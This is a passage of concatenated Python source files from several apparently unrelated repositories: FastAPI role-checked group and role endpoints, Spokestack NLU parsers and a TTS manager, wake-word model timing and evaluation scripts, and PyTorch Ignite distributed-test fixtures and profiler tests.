router = APIRouter()
@router.get("/group", response_model=IGetResponseBase[Page[IGroupRead]])
async def get_groups(
params: Params = Depends(),
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user()),
):
groups = await crud.group.get_multi_paginated(db_session, params=params)
return IGetResponseBase[Page[IGroupRead]](data=groups)
@router.get("/group/{group_id}", response_model=IGetResponseBase[IGroupReadWithUsers])
async def get_group_by_id(
group_id: UUID,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user()),
):
group = await crud.group.get(db_session, id=group_id)
return IGetResponseBase[IGroupReadWithUsers](data=group)
@router.post("/group", response_model=IPostResponseBase[IGroupRead])
async def create_group(
group: IGroupCreate,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user(required_roles=[IRoleEnum.admin, IRoleEnum.manager])),
):
new_group = await crud.group.create(db_session, obj_in=group, created_by_id=current_user.id)
return IPostResponseBase[IGroupRead](data=new_group)
@router.put("/group/{group_id}", response_model=IPutResponseBase[IGroupRead])
async def update_group(
group_id: UUID,
group: IGroupUpdate,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user(required_roles=[IRoleEnum.admin, IRoleEnum.manager])),
):
group_current = await crud.group.get(db_session=db_session, id=group_id)
if not group_current:
raise HTTPException(status_code=404, detail="Group not found")
group_updated = await crud.group.update(db_session, obj_current=group_current, obj_new=group)
return IPutResponseBase[IGroupRead](data=group_updated)
@router.post("/group/add_user/{user_id}/{group_id}", response_model=IPostResponseBase[IGroupRead])
async def add_user_to_group(
user_id: UUID,
group_id: UUID,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user(required_roles=[IRoleEnum.admin, IRoleEnum.manager])),
):
user = await crud.user.get(db_session=db_session, id=user_id)
if not user:
raise HTTPException(status_code=404, detail="User not found")
group = await crud.group.add_user_to_group(db_session, user=user, group_id=group_id)
return IPostResponseBase[IGroupRead](message="User added to group", data=group)
```
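The endpoints above return payloads wrapped in generic response models such as `IGetResponseBase[Page[IGroupRead]]`. The schemas module itself is not included here, but a minimal sketch of how such a wrapper can be declared with pydantic v1's `GenericModel` looks like this (the class name and fields are assumptions, not the project's actual definitions):
```python
from typing import Generic, Optional, TypeVar

from pydantic.generics import GenericModel

DataT = TypeVar("DataT")

class IGetResponseBaseSketch(GenericModel, Generic[DataT]):
    """Hypothetical stand-in for app.schemas.common.IGetResponseBase."""
    message: str = ""
    data: Optional[DataT] = None

# Parametrizing the wrapper validates the payload against the given type.
wrapped = IGetResponseBaseSketch[int](data=3)
assert wrapped.data == 3
```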
#### File: api_v1/endpoints/role.py
```python
from app.models.user import User
from app.schemas.common import (
IGetResponseBase,
IPostResponseBase,
IPutResponseBase,
)
from fastapi_pagination import Page, Params
from app.schemas.role import IRoleCreate, IRoleRead, IRoleUpdate
from sqlmodel.ext.asyncio.session import AsyncSession
from fastapi import APIRouter, Depends, HTTPException
from app.api import deps
from app import crud
from uuid import UUID
from app.schemas.role import IRoleEnum
router = APIRouter()
@router.get("/role", response_model=IGetResponseBase[Page[IRoleRead]])
async def get_roles(
params: Params = Depends(),
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user()),
):
roles = await crud.role.get_multi_paginated(db_session, params=params)
return IGetResponseBase[Page[IRoleRead]](data=roles)
@router.get("/role/{role_id}", response_model=IGetResponseBase[IRoleRead])
async def get_role_by_id(
role_id: UUID,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user()),
):
role = await crud.role.get(db_session, id=role_id)
return IGetResponseBase[IRoleRead](data=role)
@router.post("/role", response_model=IPostResponseBase[IRoleRead])
async def create_role(
role: IRoleCreate,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user(required_roles=[IRoleEnum.admin])),
):
    new_role = await crud.role.create(db_session, obj_in=role)
    return IPostResponseBase[IRoleRead](data=new_role)
@router.put("/role/{role_id}", response_model=IPutResponseBase[IRoleRead])
async def update_role(
role_id: UUID,
role: IRoleUpdate,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user(required_roles=[IRoleEnum.admin])),
):
current_role = await crud.role.get(db_session=db_session, id=role_id)
if not current_role:
        raise HTTPException(status_code=404, detail="Role not found")
updated_role = await crud.role.update(db_session, obj_current=current_role, obj_new=role)
return IPutResponseBase[IRoleRead](data=updated_role)
```
#### File: app/api/deps.py
```python
from typing import AsyncGenerator, List
from fastapi import Depends, HTTPException, status
from fastapi.security import OAuth2PasswordBearer
from jose import jwt
from app.models.user import User
from pydantic import ValidationError
from app import crud
from app.core import security
from app.core.config import settings
from app.db.session import SessionLocal
from sqlmodel.ext.asyncio.session import AsyncSession
from app.schemas.common import IMetaGeneral
reusable_oauth2 = OAuth2PasswordBearer(
tokenUrl=f"{settings.API_V1_STR}/login/access-token"
)
async def get_db() -> AsyncGenerator[AsyncSession, None]:
async with SessionLocal() as session:
yield session
async def get_general_meta(
db_session: AsyncSession = Depends(get_db)
) -> IMetaGeneral:
current_roles = await crud.role.get_multi(db_session, skip=0, limit=100)
return IMetaGeneral(roles=current_roles)
def get_current_user(required_roles: List[str] = None) -> User:
async def current_user(
db_session: AsyncSession = Depends(get_db),
token: str = Depends(reusable_oauth2)
) -> User:
try:
payload = jwt.decode(token, settings.SECRET_KEY, algorithms=[security.ALGORITHM])
except (jwt.JWTError, ValidationError):
raise HTTPException(
status_code=status.HTTP_403_FORBIDDEN,
detail="Could not validate credentials",
)
user: User = await crud.user.get_user_by_id(db_session, id=payload["sub"])
if not user:
raise HTTPException(status_code=404, detail="User not found")
if not user.is_active:
raise HTTPException(status_code=400, detail="Inactive user")
if required_roles:
is_valid_role = False
for role in required_roles:
if role == user.role.name:
is_valid_role = True
            if not is_valid_role:
raise HTTPException(
status_code=403,
detail=f'Role "{required_roles}" is required to perform this action',
)
return user
return current_user
``` |
{
"source": "jonra1993/WakeWord-Detection",
"score": 3
} |
#### File: nlu/parsers/entity.py
```python
from typing import Any, Dict
def parse(metadata: Dict[str, Any], raw_value: str) -> str:
"""Entity Parser
Args:
metadata (Dict[str, Any]): metadata for entity slot
raw_value (str): tagged entity
Returns:
(str): tagged entity
"""
return raw_value
```
#### File: nlu/parsers/selset.py
```python
from typing import Any, Dict, Union
def parse(metadata: Dict[str, Any], raw_value: str) -> Union[str, None]:
"""Selset Parser
Args:
metadata (Dict[str, Any]): slot metadata
raw_value (str): value tagged by the model
Returns:
Union[str, None]: selset or None if invalid
"""
normalized = raw_value.lower()
selections = metadata.get("selections", [])
for selection in selections:
name = selection.get("name")
if name.lower() == normalized:
return name
aliases = selection.get("aliases")
for alias in aliases:
if alias.lower() == normalized:
return name
return None
```
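A quick usage sketch of the selset parser above; the metadata values are made up for illustration, and the import path is inferred from the file header:
```python
from spokestack.nlu.parsers.selset import parse  # path inferred from the file header

metadata = {
    "selections": [
        {"name": "lights", "aliases": ["lamp", "bulb"]},
    ]
}

assert parse(metadata, "Lamp") == "lights"  # alias match is case-insensitive
assert parse(metadata, "fan") is None       # nothing matches, so the slot is invalid
```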
#### File: spokestack/tts/manager.py
```python
from streamp3 import MP3Decoder # type: ignore
class TextToSpeechManager:
"""Manages tts client and io target.
Args:
client: Text to speech client that returns encoded mp3 audio
output: Audio io target
"""
def __init__(self, client, output) -> None:
self._client = client
self._output = output
def synthesize(self, utterance: str, mode: str, voice: str) -> None:
"""Synthesizes the given utterance with the voice and format provided.
Args:
utterance (str): string that needs to be rendered as speech.
mode (str): synthesis mode to use with utterance. text, ssml, markdown, etc.
voice (str): name of the tts voice.
"""
stream = self._client.synthesize(utterance, mode, voice)
stream = SequenceIO(stream)
for frame in MP3Decoder(stream):
self._output.write(frame)
def close(self) -> None:
""" Closes the client and output. """
self._client = None
self._output = None
class SequenceIO:
""" Wrapper that allows for incrementally received audio to be decoded. """
def __init__(self, sequence):
self._sequence = iter(sequence)
def read(self, size=None):
try:
return next(self._sequence)
except StopIteration:
return b""
```
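A minimal sketch of how `SequenceIO` adapts incrementally received byte chunks to the file-like `read()` interface that `MP3Decoder` expects; the chunk values are illustrative and the import path is inferred from the file header:
```python
from spokestack.tts.manager import SequenceIO  # path inferred from the file header

chunks = [b"first-mp3-chunk", b"second-mp3-chunk"]  # stand-ins for streamed MP3 data
stream = SequenceIO(chunks)

assert stream.read() == b"first-mp3-chunk"
assert stream.read() == b"second-mp3-chunk"
assert stream.read() == b""  # an exhausted stream yields empty bytes
```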
#### File: WakeWord-Detection/utils/time_tf_models.py
```python
from json import load
import os
import sys
import time
import argparse
import numpy as np
from tqdm import tqdm
from tensorflow.keras.models import load_model
import tensorflow.lite as tflite
def time_tf_model(model, num_timesteps, num_features, model_type, num_runs):
# define model input shape
if model_type == 'Wavenet':
X_shape = (1, num_timesteps, num_features)
elif model_type == 'CRNN':
X_shape = (1, num_features, num_timesteps, 1)
# create random input vector
X = np.array(np.random.random_sample(X_shape), dtype=np.float32)
# prime the Tensorflow graph, first run is slow
model.predict(X)
total_time = 0.0
for _ in tqdm(range(num_runs)):
start = time.perf_counter()
model.predict(X)
total_time += time.perf_counter() - start
return total_time/num_runs
def time_tf_lite_models(encode, detect, num_runs):
# allocate input and output tensors for models
encode.allocate_tensors()
detect.allocate_tensors()
# Get input and output information for models.
encode_input_details = encode.get_input_details()
encode_output_details = encode.get_output_details()
detect_input_details = detect.get_input_details()
# Create random input vector
X_shape = encode_input_details[0]['shape']
X = np.array(np.random.random_sample(X_shape), dtype=np.float32)
    # prime TF-Lite models, first time is slow
    encode.set_tensor(encode_input_details[0]['index'], X)
    encode.invoke()
    encoded = encode.get_tensor(encode_output_details[0]['index'])
    detect.set_tensor(detect_input_details[0]['index'], encoded)
    detect.invoke()
# get average inference time
total_time = 0.0
for _ in tqdm(range(num_runs)):
start = time.perf_counter()
        encode.set_tensor(encode_input_details[0]['index'], X)
        encode.invoke()
        encoded = encode.get_tensor(encode_output_details[0]['index'])
        detect.set_tensor(detect_input_details[0]['index'], encoded)
        detect.invoke()
total_time += time.perf_counter() - start
return total_time/num_runs
def load_wavenet(model_dir):
    return load_model(model_dir)
def load_crnn(model_dir):
    return load_model(model_dir)
def load_tensorflow_model(model_dir, model_type):
    # load the appropriate model type using the arguments passed in
    if model_type == 'Wavenet':
        tf_model = load_wavenet(model_dir)
    elif model_type == 'CRNN':
        tf_model = load_crnn(model_dir)
    return tf_model
def time_models(args):
# Load the Tensorflow model
tf_model = load_tensorflow_model(args.tf_model_dir, args.model_type)
# run timings on Tensorflow model
print(f'Running timings on Tensorflow {args.model_type} model')
avg_time_tf = time_tf_model(tf_model, args.timesteps, args.num_features, args.model_type, args.num_runs)
print(f'Tensorflow average time: {avg_time_tf} secs')
# Load Tensorflow Lite models
tf_lite_encode = tflite.Interpreter(model_path=os.path.join(args.tf_lite_model_dir, 'encode.tflite'))
tf_lite_detect = tflite.Interpreter(model_path=os.path.join(args.tf_lite_model_dir, 'detect.tflite'))
# run timings on Tensorflow Lite models
print(f'Running timings on Tensorflow-Lite {args.model_type} models')
avg_time_tf_lite = time_tf_lite_models(tf_lite_encode, tf_lite_detect, args.num_runs)
print(f'TF-Lite average time: {avg_time_tf_lite} secs')
    # run timings on quantized Tensorflow Lite models
if args.time_quantized:
tf_lite_encode = tflite.Interpreter(model_path=os.path.join(args.tf_lite_model_dir, 'encode-quant.tflite'))
tf_lite_detect = tflite.Interpreter(model_path=os.path.join(args.tf_lite_model_dir, 'detect-quant.tflite'))
print(f'Running timings on quantized Tensorflow-Lite {args.model_type} models')
avg_time_tf_lite = time_tf_lite_models(tf_lite_encode, tf_lite_detect, args.num_runs)
print(f'TF-Lite average time: {avg_time_tf_lite} secs')
def parse_args():
    parser = argparse.ArgumentParser(description='Gets inference timings for Tensorflow and TF-Lite versions of Wavenet and CRNN models.')
parser.add_argument('--model_type', type=str, default='Wavenet', choices=['CRNN', 'Wavenet'], help='Model type being evaluated.')
parser.add_argument('--tf_model_dir', type=str, default='tf_models', help='Directory with Tensorflow models')
parser.add_argument('--tf_lite_model_dir', type=str, default='tf_lite_models', help='Directory with Tensorflow Lite models')
    parser.add_argument('--num_features', type=int, default=40, help='Number of features per-timestep')
parser.add_argument('--timesteps', type=int, default=182, help='Number of timesteps per example, None for variable length')
    parser.add_argument('--num_runs', type=int, default=10, help='Number of runs to get average inference time')
parser.add_argument('--time_quantized', action='store_true', help='Time quantized version of TF-Lite models')
return parser.parse_args()
def main(args):
start = time.time()
time_models(args)
print(f'Script completed in {time.time()-start:.2f} secs')
return 0
if __name__ == '__main__':
args = parse_args()
sys.exit(main(args))
```
#### File: wwdetect/CRNN/evaluate.py
```python
import sys
import os
import argparse
from tqdm import tqdm
import tensorflow as tf
from tensorflow.keras import metrics, models
from sklearn.metrics import balanced_accuracy_score, accuracy_score
import numpy as np
from matplotlib import pyplot as plt
from dataloader import HeySnipsPreprocessed
from tensorflow_tflite import TFLiteModel
# Metrics to calculate for each model.
METRICS = [
metrics.TruePositives(name='tp'),
metrics.FalsePositives(name='fp'),
metrics.TrueNegatives(name='tn'),
metrics.FalseNegatives(name='fn'),
metrics.Precision(name='precision'),
metrics.Recall(name='recall')
]
def prep_test_data(data_path, input_frames, input_features, ctc):
'''
Small function to load test data.
:param data_path: Path to .h5 file containing data.
:param input_frames: Number of input frames model expects.
:param input_features: Number of input features model expects.
    :param ctc: Boolean, whether the model is CTC-based.
:return: Loaded test generator.
'''
test_generator = HeySnipsPreprocessed([os.path.join(data_path, "test.h5")],
batch_size=0,
frame_num=input_frames,
feature_num=input_features,
ctc=ctc)
return test_generator
def eval_basics(encoder, decoder, test_generator):
'''
Evaluation for model trained with cross-entropy loss
(two output nodes, first is not wakeword, second is
wakeword).
:param encoder: Preloaded encoder model.
:param decoder: Preloaded decoder model.
:param test_generator: Generator for test data.
:return: Dict with all statistics.
'''
X, y = test_generator[0]
keys = test_generator.list_IDs_temp
FAs = []
FRs = []
X = X.astype(np.float32)
y = y[:,1]
y_pred = []
index = 0
for sample in tqdm(X):
sample = np.expand_dims(sample, axis=0)
y_pred_sample = encoder(sample)[0]
y_pred_sample = np.squeeze(decoder(y_pred_sample)[0])
y_pred.append(float(y_pred_sample[1]))
index += 1
y_pred = np.array(y_pred)
y_pred_class = np.where(y_pred >= 0.5,1,0)
for index, (prediction, actual) in enumerate(zip(y_pred_class, y)):
if prediction == 1 and actual == 0:
FAs.append(keys[index])
if prediction == 0 and actual == 1:
FRs.append(keys[index])
print("False accept files:", FAs)
print("False reject files:", FRs)
acc = accuracy_score(y, y_pred_class)
bal_acc = balanced_accuracy_score(y, y_pred_class)
stats = {}
for metric in METRICS:
metric.reset_states()
metric.update_state(y,y_pred_class)
print(f"{metric.name}: {metric.result().numpy()}")
stats[metric.name] = metric.result().numpy()
print(f"accuracy: {acc}")
print(f"balanced accuracy: {bal_acc}")
stats["accuracy"] = acc
stats["balanced accuracy"] = bal_acc
return stats
def eval_CTC(encoder, decoder, test_generator):
'''
Evaluation for model trained with CTC loss.
:param encoder: Preloaded encoder tflite model.
:param decoder: Preloaded decoder tflite model.
:param test_generator: Generator containing test data.
:return: None.
'''
X, y = test_generator[0]
X = X.astype(np.float32)
y_seq = [tf.strings.reduce_join(test_generator.num2char(y_i)).numpy().decode("utf-8") for y_i in y]
y_pred = []
index = 0
# Iterate through all test samples and decode output of model.
for sample in tqdm(X):
sample = np.expand_dims(sample, axis=0)
y_encode_sample = encoder(sample)[0]
y_decode_sample = decoder(y_encode_sample)[0]
input_len = np.ones(y_decode_sample.shape[0]) * y_decode_sample.shape[1]
# Final index must change based on how long the max target sequence length is.
# Current setup is two, sequences are '[HEY][SNIPS]' and '[OTHER]'.
result = tf.keras.backend.ctc_decode(y_decode_sample, input_length=input_len, greedy=True)[0][0][:, :2]
result_labels = "".join(test_generator.num2char(result[0].numpy()))
        # Toggle to plot posterior trajectories (disabled by default).
        plot_posteriors = False
        if plot_posteriors and y_seq[index] == "[HEY][SNIPS]":
labels = list(test_generator.char2num_dict.keys())[1:] + ['[BLANK]']
target = "".join([test_generator.num2char_dict[num] for num in y[index] if num >= 0])
plt.imshow(np.squeeze(y_decode_sample).T, cmap='Greys')
plt.yticks(ticks=list(range(len(labels))), labels=labels)
plt.xticks(ticks=list(range(int(input_len[0]))))
plt.xlabel("timepoint")
plt.title("Target sequence: " + str(target))
plt.show()
y_pred += [result_labels]
index += 1
# Convert sequences to classes.
y_pred_class = [1 if y_pred_i == "[HEY][SNIPS]" else 0 for y_pred_i in y_pred]
y_true_class = [1 if y_i == "[HEY][SNIPS]" else 0 for y_i in y_seq]
# Calculate and output metrics.
bal_acc = balanced_accuracy_score(y_true_class, y_pred_class)
for metric in METRICS:
metric.update_state(y_true_class,y_pred_class)
print(f"{metric.name}: {metric.result().numpy()}")
print(f"balanced accuracy: {bal_acc}")
def parse_args():
'''
Parse commandline arguments.
:return: Arguments dict.
'''
parser = argparse.ArgumentParser(description='Evaluates CRNN model(s).')
parser.add_argument('--data_dir', type=str, default='/Users/amie/Desktop/OHSU/CS606 - Deep Learning II/FinalProject/spokestack-python/data_speech_isolated/silero', help='Directory where test data is stored.')
parser.add_argument('--model_dir', type=str, default='models/Arik_CRNN_data_nosilence_enhanced')
args = parser.parse_args()
return args
def load_model(encode_path, detect_path):
'''
Helper function to load tflite model.
:param encode_path: Path to encoder model.
:param detect_path: Path to detect model.
:return: Loaded models.
'''
encode_model: TFLiteModel = TFLiteModel(
model_path=encode_path
)
detect_model: TFLiteModel = TFLiteModel(
model_path=detect_path
)
return encode_model, detect_model
def main(args):
encode_model, detect_model = load_model(os.path.join(args.model_dir, "encode.tflite"),
os.path.join(args.model_dir, "detect.tflite"))
if "CTC" in args.model_dir:
test = prep_test_data(args.data_dir, ctc=True, input_features=40, input_frames=151)
eval_CTC(encode_model, detect_model, test)
else:
test = prep_test_data(args.data_dir, ctc=False, input_features=40, input_frames=151)
eval_basics(encode_model, detect_model, test)
if __name__ == "__main__":
args = parse_args()
sys.exit(main(args))
``` |
{
"source": "jonrbates/ignite",
"score": 2
} |
#### File: tests/ignite/conftest.py
```python
import shutil
import tempfile
import pytest
import torch
import torch.distributed as dist
@pytest.fixture()
def dirname():
path = tempfile.mkdtemp()
yield path
shutil.rmtree(path)
@pytest.fixture()
def local_rank(worker_id):
    """ use a different local rank for each xdist worker """
if "gw" in worker_id:
return int(worker_id.replace("gw", ""))
elif "master" == worker_id:
return 0
raise RuntimeError("Can not get rank from worker_id={}".format(worker_id))
@pytest.fixture()
def distributed_context_single_node_nccl(local_rank):
import os
if "WORLD_SIZE" not in os.environ:
os.environ["WORLD_SIZE"] = "{}".format(torch.cuda.device_count())
dist_info = {
"backend": "nccl",
"world_size": int(os.environ["WORLD_SIZE"]),
"rank": local_rank,
"init_method": "tcp://localhost:2223",
}
dist.init_process_group(**dist_info)
dist.barrier()
    torch.cuda.set_device(local_rank)
yield {"local_rank": local_rank}
dist.barrier()
dist.destroy_process_group()
@pytest.fixture()
def distributed_context_single_node_gloo(local_rank):
import os
from datetime import timedelta
if "WORLD_SIZE" not in os.environ:
os.environ["WORLD_SIZE"] = "1"
dist_info = {
"backend": "gloo",
"world_size": int(os.environ["WORLD_SIZE"]),
"rank": local_rank,
"init_method": "tcp://localhost:2222",
"timeout": timedelta(seconds=60),
}
dist.init_process_group(**dist_info)
dist.barrier()
yield {"local_rank": local_rank}
dist.barrier()
dist.destroy_process_group()
@pytest.fixture()
def multi_node_conf(local_rank):
import os
assert "node_id" in os.environ
assert "nnodes" in os.environ
assert "nproc_per_node" in os.environ
node_id = int(os.environ["node_id"])
nnodes = int(os.environ["nnodes"])
nproc_per_node = int(os.environ["nproc_per_node"])
out = {
"world_size": nnodes * nproc_per_node,
"rank": local_rank + node_id * nproc_per_node,
"local_rank": local_rank,
}
return out
@pytest.fixture()
def distributed_context_multi_node_gloo(multi_node_conf):
import os
assert "MASTER_ADDR" in os.environ
assert "MASTER_PORT" in os.environ
dist_info = {
"backend": "gloo",
"init_method": "env://",
"world_size": multi_node_conf["world_size"],
"rank": multi_node_conf["rank"],
}
dist.init_process_group(**dist_info)
dist.barrier()
yield multi_node_conf
dist.barrier()
dist.destroy_process_group()
@pytest.fixture()
def distributed_context_multi_node_nccl(multi_node_conf):
import os
assert "MASTER_ADDR" in os.environ
assert "MASTER_PORT" in os.environ
dist_info = {
"backend": "nccl",
"init_method": "env://",
"world_size": multi_node_conf["world_size"],
"rank": multi_node_conf["rank"],
}
dist.init_process_group(**dist_info)
dist.barrier()
    torch.cuda.set_device(multi_node_conf["local_rank"])
yield multi_node_conf
dist.barrier()
dist.destroy_process_group()
```
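A minimal sketch of a test consuming one of these fixtures; pytest injects it by parameter name, and the assertions only restate what the fixture already establishes:
```python
# Hypothetical test module living alongside this conftest.py.
import torch.distributed as dist

def test_gloo_context_is_initialized(distributed_context_single_node_gloo):
    local_rank = distributed_context_single_node_gloo["local_rank"]
    assert dist.is_initialized()
    assert dist.get_rank() == local_rank
```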
#### File: contrib/handlers/test_time_profilers.py
```python
import os
import time
from pytest import approx
from ignite.contrib.handlers.time_profilers import BasicTimeProfiler
from ignite.engine import Engine, Events
def _do_nothing_update_fn(engine, batch):
pass
def get_prepared_engine(true_event_handler_time):
dummy_trainer = Engine(_do_nothing_update_fn)
@dummy_trainer.on(Events.STARTED)
def delay_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.COMPLETED)
def delay_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.EPOCH_STARTED)
def delay_epoch_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.EPOCH_COMPLETED)
def delay_epoch_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.ITERATION_STARTED)
def delay_iter_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.ITERATION_COMPLETED)
def delay_iter_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.GET_BATCH_STARTED)
def delay_get_batch_started(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.GET_BATCH_COMPLETED)
def delay_get_batch_completed(engine):
time.sleep(true_event_handler_time)
return dummy_trainer
def test_dataflow_timer():
true_dataflow_time_per_ele = 0.1
true_max_epochs = 1
true_num_iters = 2
def dummy_data_loader(data):
while True:
for d in data:
time.sleep(true_dataflow_time_per_ele)
yield d
dummy_data = range(true_num_iters)
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
dummy_trainer.run(dummy_data_loader(dummy_data), max_epochs=true_max_epochs, epoch_length=true_num_iters)
results = profiler.get_results()
dataflow_results = results["dataflow_stats"]
assert dataflow_results["min/index"][0] == approx(true_dataflow_time_per_ele, abs=1e-1)
assert dataflow_results["max/index"][0] == approx(true_dataflow_time_per_ele, abs=1e-1)
assert dataflow_results["mean"] == approx(true_dataflow_time_per_ele, abs=1e-1)
assert dataflow_results["std"] == approx(0.0, abs=1e-1)
assert dataflow_results["total"] == approx(true_num_iters * true_dataflow_time_per_ele, abs=1e-1)
def test_processing_timer():
true_processing_time = 0.1
true_max_epochs = 2
true_num_iters = 2
def train_updater(engine, batch):
time.sleep(true_processing_time)
profiler = BasicTimeProfiler()
dummy_trainer = Engine(train_updater)
profiler.attach(dummy_trainer)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
processing_results = results["processing_stats"]
assert processing_results["min/index"][0] == approx(true_processing_time, abs=1e-1)
assert processing_results["max/index"][0] == approx(true_processing_time, abs=1e-1)
assert processing_results["mean"] == approx(true_processing_time, abs=1e-1)
assert processing_results["std"] == approx(0.0, abs=1e-1)
assert processing_results["total"] == approx(true_max_epochs * true_num_iters * true_processing_time, abs=1e-1)
def test_event_handler_started():
true_event_handler_time = 0.1
true_max_epochs = 2
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.STARTED)
def delay_start(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["STARTED"]
assert event_results["total"] == approx(true_event_handler_time, abs=1e-1)
def test_event_handler_completed():
true_event_handler_time = 0.1
true_max_epochs = 2
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.COMPLETED)
def delay_complete(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["COMPLETED"]
assert event_results["total"] == approx(true_event_handler_time, abs=1e-1)
def test_event_handler_epoch_started():
true_event_handler_time = 0.1
true_max_epochs = 2
true_num_iters = 1
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.EPOCH_STARTED)
def delay_epoch_start(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["EPOCH_STARTED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
assert event_results["total"] == approx(true_max_epochs * true_event_handler_time, abs=1e-1)
def test_event_handler_epoch_completed():
true_event_handler_time = 0.1
true_max_epochs = 2
true_num_iters = 1
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.EPOCH_COMPLETED)
def delay_epoch_complete(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["EPOCH_COMPLETED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
assert event_results["total"] == approx(true_max_epochs * true_event_handler_time, abs=1e-1)
def test_event_handler_iteration_started():
true_event_handler_time = 0.1
true_max_epochs = 1
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.ITERATION_STARTED)
def delay_iter_start(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["ITERATION_STARTED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
assert event_results["total"] == approx(true_max_epochs * true_num_iters * true_event_handler_time, abs=1e-1)
def test_event_handler_iteration_completed():
true_event_handler_time = 0.1
true_max_epochs = 1
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.ITERATION_COMPLETED)
def delay_iter_complete(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["ITERATION_COMPLETED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
assert event_results["total"] == approx(true_max_epochs * true_num_iters * true_event_handler_time, abs=1e-1)
def test_event_handler_get_batch_started():
true_event_handler_time = 0.1
true_max_epochs = 1
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.GET_BATCH_STARTED)
def delay_get_batch_started(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["GET_BATCH_STARTED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
assert event_results["total"] == approx(true_max_epochs * true_num_iters * true_event_handler_time, abs=1e-1)
def test_event_handler_get_batch_completed():
true_event_handler_time = 0.1
true_max_epochs = 1
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.GET_BATCH_COMPLETED)
def delay_get_batch_completed(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["GET_BATCH_COMPLETED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
